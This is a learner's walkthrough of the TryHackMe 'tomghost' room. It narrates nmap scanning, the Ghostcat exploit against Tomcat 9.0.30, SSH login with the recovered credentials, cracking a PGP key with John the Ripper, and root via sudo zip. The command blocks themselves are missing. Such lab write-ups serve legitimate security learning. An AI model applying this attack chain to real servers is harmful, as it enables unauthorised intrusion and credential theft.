tomghost
I have to find out what is on the server. For this, we can use an nmap scan with the following command:
We then read the nmap file to see what the server has on it:
We can see that there are 4 main ports available. Since there is no port 80 (regular HTTP port), we have to look at other ports to see if there is a website for any of these services. Port 8080, had this on the site:
We now know that they are using the Apache version Tomcat 9.0.30. I will try to use msfconsole (Metasploit) in order to find out if there is a vulnerability against this. Searching on exploit-db.com led me to this:
At this point, I am thinking that "Ghostcat" might be my way in. I then used searchsploit in order to see what exploits are currently on my ParrotOS relating to this:
I will then copy this file to my local directory so I can use it for the exploit:
I did get lost here because I did find the right exploit, but it was not working for some reason. I did have to search online at this part, and came upon this website, and I saw they were using a command similar to mine with only one change: they were using the "python2.7" command instead of the regular "python" command. I entered the following:
The output to the command was the following:
After this, I saved the username and password. I had to see where the username and password would fit into. Turns out, it works for SSH:
There were 2 files in this directory: credential.pgp and tryhackme.asc. Neither of them looked as interesting as I thought they would. Looking around, I found a folder of a different user, and in their directory, I found the user.txt file.
I realized that to switch my user access, to merlin (or even to root), I had to do something with the files in the skyfuck directory. I downloaded them using scp:
I did run into run more trouble here as well. While trying to import the tryhackme.asc by gpg, it was asking me for a password, which I did not have. I had to refer back to the previous website to see how else I can attack this problem. Based on the website, my next step was to use John the ripper to crack the asc file. Prior to doing that, I did have to change into a format that is readable by John. Here is where programs in /opt/john/ come into play. They convert files from one type into a john crackable format. We will use "gpg2john.py".
Running john on it let me to a password:
I then used the commands on this website in order to decrypt the files using the password from the john command.
From there, I got into merlin's account using that password. I ran "sudo -l" to see what commands the user merlin is able to do.
We can see that merlin is able to the "zip" command. I have not used this command before, so i will have to do research into how we can root using this. I went to the GTFObins website to see how I am able to get root on this machine. I ran the following commands:
After this, I had a root shell. I was then able to read the contents of /root/root.txt.
I had now gotten the password and had completed the room. Overall, it was a great room. I did get lost a couple of times, but I think that's part of the learning process.
Last updated